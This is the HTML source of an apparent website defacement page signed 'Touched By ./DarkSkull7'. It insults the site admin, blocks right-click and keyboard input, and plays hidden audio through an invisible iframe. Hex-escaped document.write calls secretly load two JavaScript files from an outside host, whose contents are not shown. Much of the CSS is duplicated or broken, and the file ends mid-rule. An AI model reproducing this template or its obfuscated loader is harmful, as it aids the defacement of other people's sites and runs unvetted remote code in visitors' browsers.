hahahahahaha<html>
 <head> 
  <title>i say hello ! ! ! </title> 
  <meta charset="utf-8">
   <meta name="keyword" content="jemboodd">
   <meta name="description" content="puko mak kah"> 
 </head> 
   <link rel="SHORTCUT ICON" href="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcQg_T8-P1egIoFYvLjZ8zrnStQo1lyJCH8begoiJhNw5xXQnkz8">
   <body bgcolor="black"
margin: 100%;
-webkit-background-size: cover; 
-moz-background-size: cover;
-o-background-size: cover; 
background-size:cover;" onload="type_text()" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" oncontextmenu="return false" onkeydown="return false" onmousedown="return false"> 
  <link rel="short icon" href="http://"> 
  <link href="https://fonts.googleapis.com/css?family=Abel" rel="stylesheet" type="text/css"> 
  <link href="https://fonts.googleapis.com/css?family=Lobster" rel="stylesheet" type="text/css"> 
  <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Times"> 
  <link href="https://fonts.googleapis.com/css?family=Audiowide|Space+Mono" rel="stylesheet"> 
  <link href="http://fonts.googleapis.com/css?family=Wallpoet" rel="stylesheet" type="text/css"> 
  <link href="https://fonts.googleapis.com/css?family=Gloria+Hallelujah|Permanent+Marker" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=courier+new|Permanent+Marker" rel="stylesheet"> 
  <link href="http://fonts.googleapis.com/css?family=Quicksand" rel="stylesheet" type="text/css"> 
  <link href="http://fonts.googleapis.com/css?family=Orbitron" rel="stylesheet" type="text/css"> 
  <link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet"> 
  <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css"> 
  <link href="http://fonts.googleapis.com/css?family=Allerta+Stencil" rel="stylesheet" type="text/css"> 
  <link href="http://fonts.googleapis.com/css?family=Kumar+One+Outline" rel="stylesheet" type="text/css"> 
  <link href="https://fonts.googleapis.com/css?family=Bungee+Shade|Monoton|Nova+Square" rel="stylesheet"> 
  <link href="https://fonts.googleapis.com/css?family=Arvo|Electrolize|Iceberg" rel="stylesheet"> 
  <meta name="robots" content="Pwndz?"> 
  <meta name="keywords" content="touched"> 
  <meta name="title" content="Pwndz?"> 
  <meta name="author" content="stamped"> 
  <meta name="description" content="GaptEk"> 
  <script language="Javascript">
</script>
  <iframe width="0" height="0" src="http://examhai.com/assets/img/Aauuuu.mp3" frameborder="0" allowfullscreen=""></iframe> 
  <table width="100%" height="100%"> 
   <tbody>  
    <tr> 
     <td align="center"> 
      <center>
 <style type="text/css">
 
 p {
  margin-top: 10px;

}


.ahgcrewstyle {
       color: #F00F00;
}
.ahg { 
       color: #0F0;
}
#message font strong {
             font-family: Tahoma, Geneva, sans-serif;
             font-size: 50px;

}
.gre {
   color: #9F3;
   font-size: 36px;
}
#message font {
        font-size: 50px;
        text-align: center;
}

</style>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
 if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
 this.running = true;
 return;
 }
 this.element = element;
 this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
 this.interval = (typeof interval == "undefined" ? 100 : interval);
 this.origText = this.element.innerHTML;
 this.unparsedOrigText = this.origText;
 this.cursor = (cursor ? cursor : "");
 this.currentText = "";
 this.currentChar = 0;
 this.element.typingText = this;
 if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
 TypingText.all.push(this);
 this.running = false;
 this.inTag = false;
 this.tagBuffer = "";
 this.inHTMLEntity = false;
 this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
 for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
 return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !   this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
 } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
 this.tagBuffer += ">";
 this.inTag = false;
 this.currentText += this.tagBuffer;
 this.currentChar++;
 this.run();
 return;
 } else if(this.inTag) {
 this.tagBuffer += this.origText.charAt(this.currentChar);
 this.currentChar++;
 this.run();
 return;
 } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
 this.HTMLEntityBuffer = "&";
 this.inHTMLEntity = true;

 this.currentChar++;
 this.run();
 return;
 } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
 this.HTMLEntityBuffer += ";";
 this.inHTMLEntity = false;
 this.currentText += this.HTMLEntityBuffer;
 this.currentChar++;
 this.run();
 return;
 } else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
 this.currentChar++;
 this.run();
 return;
 } else {
 this.currentText += this.origText.charAt(this.currentChar);
 }
 this.element.innerHTML = this.currentText;
 this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
 this.currentChar++;
 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
 this.currentText = "";
 this.currentChar = 0;
 this.running = false;
 this.finishedCallback();}
}
</script>
<p id="message">
 <font color="white" face="iceland">hey ! ! admin<font color="red"> Fuck you<font color="white">^_^
</font></p><script type="text/javascript">
new TypingText(document.getElementById("message"), 50, function(i){ var ar = new Array(""); return " " + ar[i.length % ar.length]; });
//Type out examples:
TypingText.runAll();
</script><br>
 <br>
 <br>
 <br>
<img src="https://i.pinimg.com/originals/82/bb/11/82bb11738d4db2387e7c9f92be03c9ab.gif" height="400" width="500" style="opacity:5;filter:alpha(opacity=40);"
onmouseover="this.style.opacity=1; this.filters.alpha.opacity=100"
onmouseout="this.style.opacity=0.4;
this.filters.alpha.opacity=40;">

      </center> <br> <br> <br> <style type="text/css">
body { 
	color: white;
	font-family:ubuntu_monoregular, monospace; 
	text-align: center;
	
}
h2,h3,h5{ 
	font-family: , ; 
}
a:link, a:visited {
	color: gray;
	text-align: center;
	text-decoration: none;
	display: inline-block;}
a:hover, a:active{
	color:#4d0000;
}
.kedip {
-webkit-animation-name: blinker;
-webkit-animation-duration: 1s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite;

-moz-animation-name: blinker;
-moz-animation-duration: 1s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

animation-name: blinker;
animation-duration: 1s;
animation-timing-function: linear;
animation-iteration-count: infinite;

color: white;
}

@-moz-keyframes blinker {0% { opacity: 1.0; }50% { opacity: 0.0; }100% { opacity: 1.0; }}
@-webkit-keyframes blinker{0% { opacity: 1.0; }50% { opacity: 0.0; }100% { opacity: 1.0; }}
@keyframes blinker {0% { opacity: 1.0; }50% { opacity: 0.0; }
100% { opacity: 1.0; }}b {font-size: 16pt;}
</style> <style>
body{
	background:black;
}
#och{
	font-family:Courier;
	color:white;
	position:absolute;
	left:0;
	left:0;
	right:0;
	top:10%;
}
#ochh{
	font-size:25px;
	font-weight:bold;
}
img {
	opacity:0.5;-webkit-transition:all 250ms ease;-moz-transition:all 250ms ease;-o-transition:all 250ms ease;transition:all 

250ms ease;
	margin-top:-10px;
}
img:hover{	
	opacity:1
}
hr {
	width:250px;
}
a{
	color:white;
	text-decoration:none
}
a.hover{
	color:white;
}
</style> <style>

#container {
width: 97vw;
margin: 2vw auto;
}

h1 {
text-align: center;
color: #fff;
font-size: 3em;
letter-spacing: 1px;
font-family: 'Iceberg';
font-weight: 400;
/*Create overlap*/

margin: 0;
line-height: 0;
/*Animation*/

-webkit-animation: glitch1 2.5s infinite;

animation: glitch1 2.5s infinite;
}

h1:nth-child(2) {
color: #67f3da;
-webkit-animation: glitch2 2.5s infinite;
animation: glitch2 2.5s infinite;
}

h1:nth-child(3) {
color: #f16f6f;
-webkit-animation: glitch3 2.5s infinite;
animation: glitch3 2.5s infinite;
}
/*Keyframes*/

@-webkit-keyframes glitch1 {
0% {
-webkit-transform: none;
transform: none;
opacity: 1;}
7% {
-webkit-transform: skew(-0.5deg, -0.9deg);
transform: skew(-0.5deg, -0.9deg);
opacity: 0.75;
}
10% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
27% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
30% {
-webkit-transform: skew(0.8deg, -0.1deg);
transform: skew(0.8deg, -0.1deg);
opacity: 0.75;
}
35% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
52% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
55% {
-webkit-transform: skew(-1deg, 0.2deg);
transform: skew(-1deg, 0.2deg);
opacity: 0.75;
}
50% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
72% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
75% {
-webkit-transform: skew(0.4deg, 1deg);
transform: skew(0.4deg, 1deg);
opacity: 0.75;
}
80% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
100% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
}

@keyframes glitch1 {
0% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
}

@keyframes glitch1 {
0% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
7% {
-webkit-transform: skew(-0.5deg, -0.9deg);
transform: skew(-0.5deg, -0.9deg);
opacity: 0.75;
}
10% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
27% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
30% {
-webkit-transform: skew(0.8deg, -0.1deg);
transform: skew(0.8deg, -0.1deg);
opacity: 0.75;
}
35% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
52% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
55% {
-webkit-transform: skew(-1deg, 0.2deg);
transform: skew(-1deg, 0.2deg);
opacity: 0.75;
}
50% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
72% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
75% {
-webkit-transform: skew(0.4deg, 1deg);
transform: skew(0.4deg, 1deg);
opacity: 0.75;
}
80% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
100% {
-webkit-transform: none;
transform: none;
opacity: 1;
}
}

@-webkit-keyframes glitch2 {
0% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
7% {
-webkit-transform: translate(-2px, -3px);
transform: translate(-2px, -3px);
opacity: 0.5;
}
10% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
27% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
30% {
-webkit-transform: translate(-5px, -2px);
transform: translate(-5px, -2px);
opacity: 0.5;
}
35% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
52% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
55% {
-webkit-transform: translate(-5px, -1px);
transform: translate(-5px, -1px);
opacity: 0.5;
}
50% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
72% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
75% {
-webkit-transform: translate(-2px, -6px);
transform: translate(-2px, -6px);
opacity: 0.5;
}
80% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
100% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
}

@keyframes glitch2 {
0% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
7% {
-webkit-transform: translate(-2px, -3px);
transform: translate(-2px, -3px);
opacity: 0.5;
}
10% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
27% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
30% {
-webkit-transform: translate(-5px, -2px);
transform: translate(-5px, -2px);
opacity: 0.5;
}
35% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
52% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
55% {
-webkit-transform: translate(-5px, -1px);
transform: translate(-5px, -1px);
opacity: 0.5;
}
50% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
72% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
75% {
-webkit-transform: translate(-2px, -6px);
transform: translate(-2px, -6px);
opacity: 0.5;
}
80% {
-webkit-transform: none;
transform: none;
}
100% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
}
mm
@-webkit-keyframes glitch3 {
0% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
7% {
-webkit-transform: translate(2px, 3px);
transform: translate(2px, 3px);
opacity: 0.5;
}
10% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
27% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
30% {
-webkit-transform: translate(5px, 2px);
transform: translate(5px, 2px);
opacity: 0.5;
}
35% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
52% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
55% {
-webkit-transform: translate(5px, 1px);
transform: translate(5px, 1px);
opacity: 0.5;
}
50% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
72% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
75% {
-webkit-transform: translate(2px, 6px);
transform: translate(2px, 6px);
opacity: 0.5;
}
80% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
100% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
}

@keyframes glitch3 {
0% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
7% {
-webkit-transform: translate(2px, 3px);
transform: translate(2px, 3px);
opacity: 0.5;
10% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
27% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
30% {
-webkit-transform: translate(5px, 2px);
transform: translate(5px, 2px);
opacity: 0.5;
}
35% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
52% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
55% {
-webkit-transform: translate(5px, 1px);
transform: translate(5px, 1px);
opacity: 0.5;
}
50% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
72% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
75% {
-webkit-transform: translate(2px, 6px);
transform: translate(2px, 6px);
opacity: 0.5;
}
80% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
100% {
-webkit-transform: none;
transform: none;
opacity: 0.25;
}
}
body {
background-color: #000;
margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}
body,a:hover{
cursor:url(http://cur.cursors-4u.net/cursors/cur-10/cur949.png),progress!important;
}
</style> 
      <center> 
       <div id="container"> 
        <h1>Touched By ./DarkSkull7</h1> 
        <br> 
        <br> 
        <br> 
        <center> 
         <font color="green" face="courier new" size="4"> </font> 
        </center> 
 <script language="Javascript">
<!--
document.write(unescape('%3C%73%74%79%6C%65%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%68%74%6D%6C%2C%62%6F%64%79%7B%68%65%69%67%68%74%3A%31%30%30%25%3B%6D%61%72%67%69%6E%3A%30%3B%70%61%64%64%69%6E%67%3A%30%7D%75%6C%2C%6C%69%7B%74%65%78%74%2D%69%6E%64%65%6E%74%3A%30%3B%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%6E%6F%6E%65%3B%6D%61%72%67%69%6E%3A%30%3B%70%61%64%64%69%6E%67%3A%30%7D%69%6D%67%7B%62%6F%72%64%65%72%3A%30%7D%62%6F%64%79%7B%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%23%30%30%30%3B%63%6F%6C%6F%72%3A%23%39%39%39%3B%66%6F%6E%74%3A%31%30%30%25%2F%31%38%70%78%20%68%65%6C%76%65%74%69%63%61%2C%61%72%69%61%6C%2C%73%61%6E%73%2D%73%65%72%69%66%7D%63%61%6E%76%61%73%7B%63%75%72%73%6F%72%3A%63%72%6F%73%73%68%61%69%72%3B%64%69%73%70%6C%61%79%3A%62%6C%6F%63%6B%3B%6C%65%66%74%3A%30%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%74%6F%70%3A%30%3B%7A%2D%69%6E%64%65%78%3A%32%30%7D%23%68%65%61%64%65%72%20%69%6D%67%7B%77%69%64%74%68%3A%31%30%30%25%3B%68%65%69%67%68%74%3A%32%30%25%7D%23%62%67%20%69%6D%67%7B%77%69%64%74%68%3A%31%30%30%25%3B%68%65%69%67%68%74%3A%38%30%25%7D%23%68%65%61%64%65%72%2C%23%62%67%7B%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%6C%65%66%74%3A%30%3B%72%69%67%68%74%3A%30%3B%7A%2D%69%6E%64%65%78%3A%31%30%7D%23%68%65%61%64%65%72%7B%74%6F%70%3A%30%7D%23%62%67%7B%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%7A%2D%69%6E%64%65%78%3A%31%3B%62%6F%74%74%6F%6D%3A%30%7D%61%75%64%69%6F%7B%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%62%6F%74%74%6F%6D%3A%30%3B%6C%65%66%74%3A%30%3B%72%69%67%68%74%3A%30%3B%77%69%64%74%68%3A%31%30%30%25%3B%7A%2D%69%6E%64%65%78%3A%35%7D%2E%77%65%62%64%65%73%69%67%6E%7B%77%69%64%74%68%3A%33%30%25%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%74%6F%70%3A%30%3B%6C%65%66%74%3A%30%3B%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%74%61%68%6F%6D%61%3B%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%6E%6F%6E%65%3B%63%6F%6C%6F%72%3A%23%32%33%32%33%32%33%3B%66%6F%6E%74%2D%73%69%7A%65%3A%31%31%70%78%7D%2E%77%65%62%64%65%73%69%67%6E%32%7B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%74%6F%70%3A%30%3B%72%69%67%68%74%3A%30%3B%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%74%61%68%6F%6D%61%3B%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%6E%6F%6E%65%3B%63%6F%6C%6F%72%3A%23%32%33%32%33%32%33%3B%66%6F%6E%74%2D%73%69%7A%65%3A%31%31%70%78%7D%23%62%67%69%6D%67%7B%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%7D%23%62%67%69%6D%67%31%7B%64%69%73%70%6C%61%79%3A%62%6C%6F%63%6B%7D%40%6D%65%64%69%61%20%73%63%72%65%65%6E%20%61%6E%64%20%28%6D%61%78%2D%77%69%64%74%68%3A%35%30%30%70%78%29%7B%23%62%67%69%6D%67%31%7B%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%7D%23%62%67%69%6D%67%7B%64%69%73%70%6C%61%79%3A%62%6C%6F%63%6B%7D%7D%3C%2F%73%74%79%6C%65%3E%0A'));
document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%72%73%69%63%6F%2E%6E%65%74%2F%70%61%67%65%73%2F%66%77%2F%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%72%73%69%63%6F%2E%6E%65%74%2F%70%61%67%65%73%2F%66%77%2F%66%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
//-->
</script>
<style type="text/css">
 html,body {
    height:100%;
    margin:0;
    padding:0;
}
 
ul,li {
   text-indent:0;
   text-decoration:none;
   margin:0;padding:0;
}

img {
    border:0;
}

body {
   background-color:#000;
   color:#999;
   font:100%/18px helvetica,arial,sans-serif;
}

canvas {
   cursor:crosshair;
   display:block;
   left:0;
   position:absolute;
   top:0;
   z-index:20;
}
 
#header img {
   width:100%;
   height:20%;
}
 
#bg img {
   width:100%;
   height:80%;
}
 
#header,#bg {
   position:fixed;
   left:0;right:0;
   z-index:10;
}
 
#header {
   top:0;
}
 
#bg {
   position:fixed;
   z-index:1;
   bottom:0;
}
 
audio {
   position:fixed;
   display:none;
   bottom:0;
   left:0;
   right:0;
   width:100%;
   z-index:5;
}
 
.webdesign {
   width:30%;
   position:absolute;
   top:0;
   left:0;
   font-family:tahoma;
   text-decoration:none;
   color:#232323;
   font-size:11px;
}
 
.webdesign2 {
   position:absolute;
   top:0;right:0;
   font-family:tahoma;
   text-decoration:none;
   color:#232323;
   font-size:11px;
}
 
#bgimg {
   display:none;
}
 
#bgimg1 {
   display:block;
}
 
@media screen and (max-width:500px) {

#bgimg1 {
   display:none;
}

#bgimg {
   display:block;
 }
   }
</style> 
<style type="text/css">
 html,body{
     height:100%;
     margin:0;
     padding:0;
}
 
 ul,li{
     text-indent:0;
     text-decoration:none;
     margin:0;
     padding:0;
}
 
 img{
     border:0;
}
 
 body{
     background-color:#000;
     color:#999;
     font:100%/18px helvetica,arial,sans-serif;
}

 canvas{
     cursor:crosshair;
     display:block;
     left:0;
     position:absolute;
     top:0;
     z-index:20;
}
 
 #header img{
     width:100%;
     height:20%;
}
   
 #bg img{ 
     width:100%;
     height:80%;
}
 
 #header,#bg{
     position:fixed;
     left:0;
     right:0;
     z-index:10;
}

 #header{
     top:0;
}
 
 #bg{
     position:fixed;
     z-index:1;
     bottom:0;
}
 
 audio{
     position:fixed;
     display:none;
     bottom:0;
     left:0;
     right:0;
     width:100%;
     z-index:5;
}
 
 .webdesign{
     width:30%;
     position:absolute;
     top:0;
     left:0;
     font-family:tahoma;
     text-decoration:none;
     color:#232323;
     font-size:11px;
}
 
 .webdesign2{
     position:absolute;
     top:0;
     right:0;
     font-family:tahoma;
     text-decoration:none;
     color:#232323;
     font-size:11px;
}
 
 #bgimg{
     display:none;
}
 
 #bgimg1{
     display:block;
}
 
@media screen and (max-width:500px) {
 
  #bgimg1{
     display:none;
}
 
 #bgimg{display:block;
}
  }
</style> 

<style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and 